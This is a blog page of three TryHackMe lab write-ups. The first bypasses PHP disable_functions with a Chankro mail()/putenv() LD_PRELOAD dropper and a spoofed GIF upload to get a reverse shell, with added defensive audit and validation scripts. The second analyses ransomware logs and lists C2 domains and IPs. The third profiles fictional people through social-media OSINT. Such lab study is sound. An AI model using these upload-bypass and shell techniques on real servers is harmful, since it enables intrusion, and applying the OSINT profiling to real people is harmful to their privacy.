Showing posts with label TryHackMe. Show all posts
  • TryHackMe Bypass Disable Functions walkthrough

     

    Bypass Disable Functions


    Practice bypassing disabled dangerous features that run operating system commands or start processes.

    This vulnerability occurs in web applications where there is the possibility of uploading a file without being checked by a security system that curbs potential dangers.

    It allows an attacker to upload files with code (scripts such as .php, .aspx and more) and run them on the same server, more information in this room.


    Among the typically applied measures is disabling dangerous functions that could execute operating system commands or start processes. Functions such as system() or shell_exec() are often disabled through PHP directives defined in the php.ini configuration file. Other functions, perhaps less known as dl() (which allows you to load a PHP extension dynamically), can go unnoticed by the system administrator and not be disabled. The usual thing in an intrusion test is to list which functions are enabled in case any have been forgotten.

    One of the easiest techniques to implement, and not a very widespread one, is to abuse the mail() and putenv() functionalities. This technique is not new; it was already reported to PHP in 2008 by gat3way, but it still works to this day. Through the putenv() function we can modify the environment variables, allowing us to assign the value we want to the variable LD_PRELOAD. Roughly, LD_PRELOAD will allow us to pre-load a .so library before the rest of the libraries, so that if a program uses a function from a library (libc.so for example), it will execute the one in our library instead of the one it should. In this way, we can hijack or "hook" functions, modifying their behaviour at will.



    Chankro: tool to evade disable_functions and open_basedir


    Through Chankro, we generate a PHP script that will act as a dropper, creating on the server a .so library and the binary (a meterpreter, for example) or bash script (reverse shell, for example) that we want to execute freely, and that will later call putenv() and mail() to launch the process.




    Install tool:


    git clone https://github.com/TarlogicSecurity/Chankro.git
    cd Chankro
    python2 chankro.py --help



    python chankro.py --arch 64 --input c.sh --output tryhackme.php --path /var/www/html

    --arch = Architecture of the victim system, 32 or 64.
    --input = File with the payload you want to execute.
    --output = Name of the PHP file you are going to create; this is the file you will need to upload.
    --path = The absolute path where our uploaded PHP file will be located on the server. For example, if our file is located in the uploads folder, DOCUMENTROOT + uploads.




     


    Now, when executing the PHP script in the web server, the necessary files will be created to execute our payload.

     



    My command ran successfully, and I created a file in the directory with the output of the command.

     

    First of all, we start the machine of the TryHackMe room Bypass Disable Functions and browse to the room's IP. What do we see there? There is an upload page where we can upload any image; we will use Burp Suite to upload our execution file, because we have to upload the PHP file by bypassing the check.

     

     



    After uploading the malicious file we have to check which directory it was uploaded to, so we will use gobuster to find the directory.

     

     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-bypassdisablefunction/Chankro]
    └─$ gobuster dir -u http://10.10.61.162/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 100 -x php
    ===============================================================
    Gobuster v3.1.0
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
    ===============================================================
    [+] Url:                     http://10.10.61.162/
    [+] Method:                  GET
    [+] Threads:                 100
    [+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
    [+] Negative Status codes:   404
    [+] User Agent:              gobuster/3.1.0
    [+] Extensions:              php
    [+] Timeout:                 10s
    ===============================================================
    2021/09/16 12:23:04 Starting gobuster in directory enumeration mode
    ===============================================================
    /uploads              (Status: 301) [Size: 314] [--> http://10.10.61.162/uploads/]
    /assets               (Status: 301) [Size: 313] [--> http://10.10.61.162/assets/] 
    /cv.php               (Status: 200) [Size: 4153]                                  
    Progress: 98580 / 441122 (22.35%) 
    
    
    

     

     

    If you want to check which ports are open on this site, you can do this with Nmap or RustScan.



     

     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-bypassdisablefunction/Chankro]
    └─$ rustscan -a 10.10.61.162 --ulimit 5000 -- -A -oN rustscan.txt                                                                 1 ⨯
    [~] Automatically increasing ulimit value to 5000.
    Open 10.10.61.162:22
    Open 10.10.61.162:80
    [~] Starting Nmap
    [>] The Nmap command to be run is nmap -A -oN rustscan.txt -vvv -p 22,80 10.10.61.162
    
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-16 12:17 IST
    NSE: Loaded 153 scripts for scanning.
    NSE: Script Pre-scanning.
    NSE: Starting runlevel 1 (of 3) scan.
    Initiating NSE at 12:17
    Completed NSE at 12:17, 0.00s elapsed
    NSE: Starting runlevel 2 (of 3) scan.
    Initiating NSE at 12:17
    Completed NSE at 12:17, 0.00s elapsed
    NSE: Starting runlevel 3 (of 3) scan.
    Initiating NSE at 12:17
    Completed NSE at 12:17, 0.00s elapsed
    Initiating Ping Scan at 12:17
    Scanning 10.10.61.162 [2 ports]
    Completed Ping Scan at 12:17, 0.24s elapsed (1 total hosts)
    Initiating Parallel DNS resolution of 1 host. at 12:17
    Completed Parallel DNS resolution of 1 host. at 12:17, 0.07s elapsed
    DNS resolution of 1 IPs took 0.07s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
    Initiating Connect Scan at 12:17
    Scanning 10.10.61.162 [2 ports]
    Discovered open port 22/tcp on 10.10.61.162
    Discovered open port 80/tcp on 10.10.61.162
    Completed Connect Scan at 12:17, 0.23s elapsed (2 total ports)
    Initiating Service scan at 12:17
    Scanning 2 services on 10.10.61.162
    Completed Service scan at 12:17, 6.50s elapsed (2 services on 1 host)
    NSE: Script scanning 10.10.61.162.
    NSE: Starting runlevel 1 (of 3) scan.
    Initiating NSE at 12:17
    Completed NSE at 12:17, 9.83s elapsed
    NSE: Starting runlevel 2 (of 3) scan.
    Initiating NSE at 12:17
    Completed NSE at 12:17, 1.21s elapsed
    NSE: Starting runlevel 3 (of 3) scan.
    Initiating NSE at 12:17
    Completed NSE at 12:17, 0.00s elapsed
    Nmap scan report for 10.10.61.162
    Host is up, received syn-ack (0.24s latency).
    Scanned at 2021-09-16 12:17:30 IST for 18s
    
    PORT   STATE SERVICE REASON  VERSION
    22/tcp open  ssh     syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   2048 1f:97:54:30:24:74:f2:fa:15:ed:f3:35:84:dc:6c:d0 (RSA)
    | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCimETxFw3xwql560SXGeR88EX/FNiDVNYE4k7xBkwrl7+5YctrnqdNtGrZO2Ki3Zav9TlGBjtRcQ2GOadDlKpLXasXzkiv3nl58+d/VNlhFvaQP1zK5w0f+31KrZnH9EfL9oEv1UZ6UCmJM1O4uvcxYoUOfj0HQJ/27bMGwPETSnWyxVkaBpY34vukFqrlL9HoPTQATrcmxwFSnDh0yn7tSHdNMa8vIlD4lek0q9NG10tBThCTDyXgLnE3++fkutFMSQZ/6EA1tnRFcFK+YgMCRqxTrfr0nQr5JZykseVNO+gpcUY1NDVUlCdMV0xK+WTlukJoRIyfm68P/BZmkyBT
    |   256 a7:21:78:6d:a6:05:7e:5a:0f:7e:53:65:0a:c4:53:49 (ECDSA)
    | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBEb8bpOpxmuRcQAiMJGyKijMw+otZD9IxXMkjgL6k2HJCA1bvpPqk7rxHbDexKDvY3MgNPAx50Mp6tttsOaVXQ=
    |   256 57:1c:22:ac:59:69:62:cb:94:bd:e9:9f:67:68:23:c9 (ED25519)
    |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHXfZcsCOQCeq6/HAIKcCimntv0KNHPvqXbsDiXH6WaD
    80/tcp open  http    syn-ack Apache httpd 2.4.18 ((Ubuntu))
    | http-methods: 
    |_  Supported Methods: GET HEAD POST OPTIONS
    |_http-server-header: Apache/2.4.18 (Ubuntu)
    |_http-title: Ecorp - Jobs
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    NSE: Script Post-scanning.
    NSE: Starting runlevel 1 (of 3) scan.
    Initiating NSE at 12:17
    Completed NSE at 12:17, 0.00s elapsed
    NSE: Starting runlevel 2 (of 3) scan.
    Initiating NSE at 12:17
    Completed NSE at 12:17, 0.00s elapsed
    NSE: Starting runlevel 3 (of 3) scan.
    Initiating NSE at 12:17
    Completed NSE at 12:17, 0.00s elapsed
    Read data files from: /usr/bin/../share/nmap
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 19.37 seconds
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-bypassdisablefunction/Chankro]
    └─$ 
      

     

     

    We found the file upload directory: /uploads

     

     

     


    When examining the site with the tool Wappalyzer, you can see that the web application is written in PHP.

     

     


    With this in mind, we can see that the file phpinfo.php is available; this file gives us information about the server configuration and the settings used to interpret PHP.

     

     


    Looking at the information that phpinfo gives us, we can see a section called disable_functions, and in it many critical functions are listed, such as:



        exec
        passthru
        shell_exec
        system
        proc_open
        popen
        curl_exec
        curl_multi_exec

     

    As we can see, we are very limited when it comes to uploading a PHP file containing code that works in our favour, but after investigating, and thanks to the information provided by this machine, we can make use of the tool Chankro.

    This tool allows us to execute commands through the mail() and putenv() functions by changing an environment variable before PHP executes the sendmail binary. A low-level explanation of what it does is given in this article.
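    As an added example (not part of the walkthrough and not code from the Chankro project), the following Python script audits a php.ini disable_functions directive: it parses the list found on this target and flags the primitives that the LD_PRELOAD technique described above (putenv() plus mail(), and the dl() loader) still needs. The php.ini fragment is a constructed sample.

```python
import re

# Functions the walkthrough found in the target's disable_functions (from phpinfo).
LISTED_ON_TARGET = {"exec", "passthru", "shell_exec", "system",
                    "proc_open", "popen", "curl_exec", "curl_multi_exec"}

# Functions the mail()/putenv() LD_PRELOAD technique and the dl() loader rely on.
# If these stay enabled, the list above does not stop process execution.
BYPASS_PRIMITIVES = {"putenv", "mail", "dl"}

# Constructed sample php.ini fragment mirroring what phpinfo showed on the target.
SAMPLE_PHP_INI = """\
; constructed sample, not the room's real configuration
expose_php = Off
disable_functions = exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec
open_basedir = /var/www/html
"""


def parse_disable_functions(ini_text):
    """Return the set of function names in disable_functions (lowercased;
    PHP function names are case-insensitive). Empty set if the directive is absent."""
    for raw in ini_text.splitlines():
        line = raw.split(";", 1)[0].strip()          # strip ini comments
        m = re.match(r"^disable_functions\s*=\s*(.*)$", line, re.IGNORECASE)
        if m:
            value = m.group(1).strip().strip('"')
            return {f.strip().lower() for f in value.split(",") if f.strip()}
    return set()


def audit(ini_text):
    """Report the disabled list and which bypass primitives are still enabled."""
    disabled = parse_disable_functions(ini_text)
    return {
        "disabled": sorted(disabled),
        "still_enabled_primitives": sorted(BYPASS_PRIMITIVES - disabled),
    }


def hardened_directive(ini_text):
    """Rewrite the directive so the bypass primitives are disabled too."""
    disabled = parse_disable_functions(ini_text) | BYPASS_PRIMITIVES
    return "disable_functions = " + ",".join(sorted(disabled))


if __name__ == "__main__":
    report = audit(SAMPLE_PHP_INI)
    print("disabled:", ", ".join(report["disabled"]))
    print("still enabled but needed for the bypass:",
          ", ".join(report["still_enabled_primitives"]))
    print(hardened_directive(SAMPLE_PHP_INI))
```

    Some applications legitimately call mail() or putenv(), so treat each still-enabled primitive as a review item rather than appending it blindly; running PHP under an unprivileged user with open_basedir set limits what a successful bypass can reach.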

    To test whether the tool works, we are going to execute whoami and write its output into the absolute path of the web root, which is /var/www/html/fa5fba5f5a39d27d8bb7fe5f518e00db/; this path is known because phpinfo shows where the web is hosted.


    I will use the tool Chankro with the following parameters, but before that we create a c.sh file:

    sudo nano c.sh

     

     



     

     

     


    ┌──(hackerboy㉿KumarAtulJaiswal)-[/opt/Chankro]
    └─$ sudo python chankro.py --arch 64 --input c.sh --output hackingtruth-exploit.php --path /var/www/html/fa5fba5f5a39d27d8bb7fe5f518e00db/uploads
    
    
         -=[ Chankro ]=-
        -={ @TheXC3LL }=-
    
    
    [+] Binary file: c.sh
    [+] Architecture: x64
    [+] Final PHP: hackingtruth-exploit.php
    
    
    [+] File created!
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/opt/Chankro]
    └─$     
    

     

    Once Chankro has created the malicious PHP file for us, I will go to the web page and upload it.

     

     

     


    While uploading the file, we intercept the request, change the Content-Type to image/jpeg, and write a GIF87a header at the start of the file.

     

    What is GIF87a?

    GIF87a is the original format for indexed color images. It uses LZW compression and has the option of being interlaced. GIF89a is the same, but also includes transparency and animation capabilities.
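    As an added example, not code from the room or from the author, here is a Python sketch of why the Content-Type/GIF87a trick passes a naive upload check and how a stricter server-side validator rejects the same file. The 1x1 GIF bytes and the GIF87a-prefixed PHP polyglot are constructed samples.

```python
import struct

GIF_SIGNATURES = (b"GIF87a", b"GIF89a")
# Magic bytes an image with the given extension must start with.
MAGIC_BY_EXT = {
    "gif": GIF_SIGNATURES,
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
}
ALL_MAGIC = tuple(m for magics in MAGIC_BY_EXT.values() for m in magics)

# Constructed samples: a minimal valid 1x1 GIF89a, and a polyglot that begins with
# the GIF87a signature but is really PHP source (the trick used in the walkthrough).
REAL_GIF = (b"GIF89a"
            + b"\x01\x00\x01\x00\x80\x00\x00"               # logical screen: 1x1, global colour table
            + b"\x00\x00\x00\xff\xff\xff"                   # 2-entry colour table
            + b"\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00"   # image descriptor
            + b"\x02\x02\x44\x01\x00"                       # LZW image data
            + b"\x3b")                                      # trailer
POLYGLOT = b"GIF87a;\n<?php echo 'constructed sample'; ?>\n"


def naive_check(content_type, data):
    """The kind of check the walkthrough defeats: trust the client-supplied
    Content-Type and look only at the first bytes of the body."""
    return content_type.startswith("image/") and data.startswith(ALL_MAGIC)


def strict_check(filename, data):
    """Server-side validation: one allowlisted extension, magic bytes that agree
    with it, no script markers anywhere, and a GIF that parses to its trailer.
    Returns (accepted, reason)."""
    parts = filename.lower().split(".")
    if len(parts) != 2 or parts[1] not in MAGIC_BY_EXT:
        return False, "extension not allowlisted or double extension"
    ext = parts[1]
    if not data.startswith(MAGIC_BY_EXT[ext]):
        return False, "magic bytes do not match extension"
    if b"<?" in data or b"<script" in data.lower():
        return False, "embedded script marker"
    if ext == "gif":
        if len(data) < 13:
            return False, "truncated GIF header"
        width, height = struct.unpack("<HH", data[6:10])   # logical screen size
        if width == 0 or height == 0:
            return False, "invalid logical screen size"
        if data[-1] != 0x3B:
            return False, "missing GIF trailer"
    # Accepted files should still be stored under a server-generated name,
    # outside the document root, and served with a fixed image Content-Type.
    return True, "ok"


if __name__ == "__main__":
    print("naive check, polyglot sent as image/jpeg:", naive_check("image/jpeg", POLYGLOT))
    print("strict check, polyglot as tryhackme.php:", strict_check("tryhackme.php", POLYGLOT))
    print("strict check, polyglot as pic.gif:", strict_check("pic.gif", POLYGLOT))
    print("strict check, real gif:", strict_check("pixel.gif", REAL_GIF))
```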

     

     

    Check whether the file was uploaded to the /uploads directory.



     


    Gaining Access 


    Now that we can see that commands can be executed at the system level, I will modify the file command.sh and add code so that, when it is executed, it starts a reverse shell to my machine on port 443:


    With this in mind, and having already modified the file command.sh, I recreate the file winsad.php with Chankro; once it is created I add the header 'GIF89a;' and upload the file.

    After uploading the PHP file again and browsing to the path where winsad.php is hosted, I can see that the code is interpreted and gives me the shell:

     

    Start a netcat listener and click on that uploaded file-

    nc -nvlp 4444

     



    Once inside the machine we can go to the user's directory s4vi and view the flag.



    www-data@ubuntu:/var/www/html/fa5fba5f5a39d27d8bb7fe5f518e00db/uploads$ cd /home
    <ml/fa5fba5f5a39d27d8bb7fe5f518e00db/uploads$ cd /home                       
    www-data@ubuntu:/home$ ls -la
    ls -la
    total 12
    drwxr-xr-x  3 root root 4096 Jun 22 08:12 .
    drwxr-xr-x 22 root root 4096 Jun 23 18:59 ..
    drwxr-xr-x  4 s4vi s4vi 4096 Jun 23 23:34 s4vi
    www-data@ubuntu:/home$ cd s4vi
    cd s4vi
    www-data@ubuntu:/home/s4vi$ 
    ls -la
    
    
    
    www-data@ubuntu:/home/s4vi$ ls -la
    total 44
    drwxr-xr-x 4 s4vi s4vi 4096 Jun 23 23:34 .
    drwxr-xr-x 3 root root 4096 Jun 22 08:12 ..
    -rw------- 1 root root 6127 Jun 23 23:49 .bash_history
    -rw-r--r-- 1 s4vi s4vi  220 Jun 22 08:12 .bash_logout
    -rw-r--r-- 1 s4vi s4vi 3771 Jun 22 08:12 .bashrc
    drwx------ 2 s4vi s4vi 4096 Jun 22 09:46 .cache
    drwxrwxr-x 2 s4vi s4vi 4096 Jun 23 23:33 .nano
    -rw-r--r-- 1 s4vi s4vi  655 Jun 22 08:12 .profile
    -rw-r--r-- 1 s4vi s4vi    0 Jun 23 17:59 .sudo_as_admin_successful
    -rw-r--r-- 1 root root  183 Jun 23 23:29 .wget-hsts
    -rw-rw-r-- 1 s4vi s4vi   37 Jun 23 23:34 flag.txt
    www-data@ubuntu:/home/s4vi$ 
    
    
    
    www-data@ubuntu:/home/s4vi$ cat flag.txt
    cat cat flag.txt
    cat: cat: No such file or directory
    thm{bypass_d1sable_functions_1n_php}
    www-data@ubuntu:/home/s4vi$ 
    
    
    
    

     

    We got it!!! 



    Disclaimer

     

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.



      - Hacking Truth by Kumar Atul Jaiswal



     

  • TryHackMe Dunkle Materie

     

     


    Hello guys, this is a writeup for the room Dunkle Materie from the TryHackMe platform. This is a medium-difficulty room that lets users investigate a ransomware attack using an application called ProcDOT.

     

     


    The firewall alerted the Security Operations Center that one of the machines at the Sales department, which stores all the customers' data, contacted the malicious domains over the network. When the Security Analysts looked closely, the data sent to the domains contained suspicious base64-encoded strings. The Analysts involved the Incident Response team in pulling the Process Monitor and network traffic data to determine if the host is infected. But once they got on the machine, they knew it was a ransomware attack by looking at the wallpaper and reading the ransomware note.




    I placed the log file into procmon as in the figure below.




    It doesn't seem to work, so I added the traffic file to Windump.


     

     


    1) Provide the two PIDs spawned from the malicious executable. (In the order as they appear in the analysis tool)

     

     


    Ans- 8644, 7128

     




    2) Provide the full path where the ransomware initially got executed? (Include the full path in your answer)

     

     


    We can see that the red box is the full path where the malware is initially executed, which is the second question.

    (The path is redacted for the learning purposes of each user.)

     


     


    Ans- c:\users\sales\appdata\local\temp\exploreer.exe




     

    3) This ransomware transfers the information about the compromised system and the encryption results to two domains over HTTP POST. What are the two C2 domains? (no space in the answer)

     

     

    After reading the third question, I looked into the first exploreer.exe found. I found a suspicious site that might be used by the “hackers”.
     
     

    On the second exploreer.exe, I also found one.




    Ans- mojobiden.com,paymenthacks.com



    4) What are the IPs of the malicious domains? (no space in the answer)
     

    Ans- 146.112.61.108,206.188.197.206





    5) Provide the user-agent used to transfer the encrypted data to the C2 channel.

     

    For this question, it wanted us to identify the user-agent used to transfer the encrypted data to the C2 channel.

    So, by right-clicking the site we found previously, we click on “Follow TCP Stream”.

     

     


    Ans- Firefox/89.0










    6) Provide the cloud security service that blocked the malicious domain.

     

     


    Now we need to identify the cloud security service that blocked the malicious domain.

    So, at the same window, scroll down a bit more. And we can see the server name.

     

    Ans- Cisco Umbrella







    7) Provide the name of the bitmap that the ransomware set up as a desktop wallpaper.

     


    Ans- ley9kpi9r.bmp







    8) Find the PID (Process ID) of the process which attempted to change the background wallpaper on the victim's machine.

     

     

     


    Ans- 4892







    9) The ransomware mounted a drive and assigned it the letter. Provide the registry key path to the mounted drive, including the drive letter.

     

    For this part, we need to find the registry key path to the mounted drive, with the drive letter. So, I started with exploreer.exe. I looked into each process in detail but failed to find the path.

    This really cost me so much time. I was looking into the registry process and back to exploreer.exe, without realizing that I had not turned off the “no path” option. I wasted about an hour until I realized it. So, after an hour in a rabbit hole, I managed to find the path.

     

     


    Ans- HKLM\SYSTEM\MountedDevices\DosDevices\Z:




    10) Now you have collected some IOCs from this investigation. Provide the name of the ransomware used in the attack. (external research required)

     

    This also took me a lot of time to research. I did not have an idea of what keyword I should use to search for it.

    I tried searching for “ransomware targeting mount drive” and others, which didn't help at all. But suddenly I thought about the site the “hacker” used before. So, I tried using one of the websites and looked it up on Google. And BAM! I got it!

     

    Ans- Blackmatter Ransomware







  • TryHackMe KaffeeSec - SoMeSINT

     




    In this room, you will be learning social media analysis and forensics. You will learn about google dorking, website archiving, social media enumeration/analysis, and the basic usage of OSINT techniques in the context of social media investigation. You don't need any previous knowledge of OSINT to do well in this room, but it definitely helps. I have included some resources in the "Resources" task at the bottom of the room that I encourage you to check out after completing this room!



    Prerequisites:


    Critical Thinking.
    A love of going deep into rabbit-holes.
    Basic understanding of Google.
    Python 3.7+





    Task 2 Story


    Background Information:


    You are Aleks Juulut, a private eye based out of Greenland. You don't usually work digitally, but have recently discovered OSINT techniques to make that aspect of your job much easier. You were recently hired by a mysterious person under the moniker "H" to investigate a suspected cheater, named Thomas Straussman.


    After a brief phone-call with his wife, Francesca Hodgerint, you've learned that he's been acting suspicious lately, but she isn't sure exactly what he could be doing wrong. She wants you to investigate him and report back anything you find. Unfortunately, you're out of the country on a family emergency and cannot get back to Greenland to meet the deadline of the investigation, so you're going to have to do all of it digitally. Good luck! 


    Answer the questions below


    1) Who hired you?

    Ans :- ks{H}


    2) Who are you investigating? (ks{firstname lastname})

    Ans :- ks{thomas straussman}





    Task 3 Let's get started!!


    Prerequisites:

    Patience, curiosity, and a passion for digging into rabbit holes.
    Firefox, Chrome, or another chromium-based browser (I recommend Brave).

    
    How exciting! Through talking to people who know Thomas, you've found out that he has a very guessable online handle: tstraussman. With this handle, we can find his social media accounts.

    
    The overall process for finding information from social media accounts starts with finding the social media accounts themselves. Finding social media accounts from names or emails can be automated through a process called enumeration. This is usually done with CLI tools or scripts, but you can get similar effects with google dorking. Here is a guide on google dorking, it's great reading material before you attempt this task and also includes a cheat-sheet that comes in handy.


    
    Before starting, I will preface this by saying the only places these accounts are found on are Twitter and Reddit. Please do not try to investigate further out-of-scope, as you will both meet a dead end and be snooping on accounts not involved with this CTF at all. I am not responsible for any actions/interactions made with an account outside of the sockpuppets created for this CTF. As a general rule, we're collecting PASSIVE information - there's no interacting directly with these accounts.



    Answer the questions below


    1) What is Thomas' favorite holiday?

    Ans :- Christmas



    It's mentioned in the bio as X-mas or Christmas.





    2) What is Thomas' birth date?

    Ans :- 12-20-1990


    His birthday is evident from the below reddit post.


     

    3) What is Thomas' fiancee's Twitter handle?

    Ans :- @fhodgelink



     

    Looking at his followers we can find the Twitter handle of his fiancee.
     

     

     

    4) What is Thomas' background picture of?

    Ans :- Buddha







     

     

    Task 4 Spider... what?


    Requirements:

        Spiderfoot
        Python 3


    First things first, make sure that you've downloaded the latest version of Python3. Then follow this guide to install the latest version of Spiderfoot (currently v3.3).






     

    Once it's installed correctly, run it by typing python3 sf.py -l 127.0.0.1:5001

    You can access the web interface by navigating to localhost:5001 in your browser.






    Click on "New Scan". In the "Scan Target" field, type in "Thomas Straussman" or "tstraussman"; then, under By Use Case, ensure that you checked the All option. Finally, press run. 



    Looking at the results, you can figure out which are false positives by filtering out anything that isn't related to Reddit or Twitter. 


    If you find a Twitter account that leads to shadowban.eu, click on the link.

    If you can't find anything related to Twitter, go to Settings --> Account Finder and set the highlighted option to False.








    1) What was the source module used to find these accounts?

    Ans :- sfp_accounts    

     


    2) Check the shadowban API. What is the value of "search"?

    Ans :- ks{1346173539712380929}






    Task 5 Connections, connections..

     

    Now that you have Thomas' Reddit and Twitter accounts, you can do some cool stuff!


    At this point, consider downloading a reverse search extension for your browser, my favorite is RevEye, which lets you choose from a handful of great reverse search engines, or use all of them simultaneously. Chrome / Firefox


    There are a few key types of information that we want to find from socials:

    Images of places that contain clear identifiers like buildings, signs, monuments, or landmarks (For IMINT/GEOMINT purposes).



    Clear images of the subject's face (For reverse image searches and possibly finding more accounts/sources of info).

    Clear images of the subject in a group of people (Family photos, friend groups, other information that can give context to their relationship with the group).

    Personal information in their bio, or other personal data from their profile itself (Where they grew up, currently live, went to school, etc..).

    Relevant posts that may contain information on their whereabouts or personal habits (Do they smoke? Drink? Go to bars often? Love to vacation to specific places? All this information can help in an investigation.)


    Since you have gotten most useful information from Thomas' Twitter, it's time to "pivot" to his fiancee's account.

    What personal information can you find?



    NOTE: If you get stuck on the first flag, consider two things:


    • You can reverse image search landscapes / locations and most likely get a result.
    • You can look at the source of the website (ctrl + shift + c, then click on the image) and try to find some metadata from the image.



    Answer the questions below


    1) Where did Thomas and his fiancee vacation to?

    Ans :- Koblenz, Germany

     

     



    Fiancé’s Twitter handle is @Fhodgelink (https://twitter.com/FHodgelink)
    It's pretty straightforward as per the below picture.

    The flag format is City, Country (7 letters, 7 letters)
      

     

    So, it will be in the format — — — -, Germany.

    Doing a reverse search of this image indicates it's Koblenz in Germany.







     

    2) When is Francesca's Mother's birthday? (without the year)

    Ans :- December 25th

     

     

    We can see it in the tweet above.

     




    3) What is the name of their cat?

    Ans :- Gotank

     

     

    https://twitter.com/FHodgelink/status/1343023195855736837

     

     




    4) What show does Francesca like to watch?

    Ans :- 90 Day Fiancee




    One of the tweets is the one below, which shares the name of the program.



    Task 6 Turn back the clock!!


    Now that we've gathered intel from Thomas and Francesca's Twitters, lets move to another platform - Reddit.


    For the sake of this investigation, we're going to be using Reddit in two different ways:

    Use the old version (http://old.reddit.com/) for wayback machine purposes

    Use the new version (https://www.reddit.com/) for other purposes (later on)


    First, you're going to want to install the WayBackMachine extension for your browser (you don't need it, but it'll make your life much easier).


        Get it for Firefox
        Get it for Chrome
       

    Using Reddit's old site, navigate to Thomas' profile. Right click anywhere on the page and click on Wayback machine --> All Versions. You will see a calendar that shows all of the saved versions of the site, click through and take a look at each saved version (in this case there should be none).


    So it hasn't been saved yet... Nothing out of the ordinary, right?

    Next, go to Thomas' birthday post. Repeat the steps to find the first version of the site and..... Voila!


    We've discovered a coworker, which is another source of intel for us! But the question is... how much intel?


    Answer the questions below


    1) What is the name of Thomas' coworker?

    Ans :- Hans Minik

     

     


     

     

    I got stuck at this stage. Finally, I used the Wayback Machine to check the snapshot for 21st Dec 2020.



     

    2) Where does his coworker live?

    Ans :- Nuuk, Greenland

     

    Thomas lives in Nuuk, as per his profile

     

     




    Looking into Hans' Reddit profile, we can find the following posts.

     


     




    3) What is the paste ID for the link we found? (flag format)

    Ans :- ks{ww4ju}

     

    Hans profile is https://web.archive.org/web/20210104143852/https://old.reddit.com/user/minikhans

     

     

     


     

     




    4) Password for the next link? (flag format)

    Ans :- ks{1qaz2wsx}

     

     


     




    5) What is the name of Thomas' mistress?

    Ans :- Emilia Moller

     

     




    Paste the password obtained in the step above into the URL and the name will be shown.





     

     




    6) What is Thomas' Email address?

    Ans :- straussmanthom@mail.com








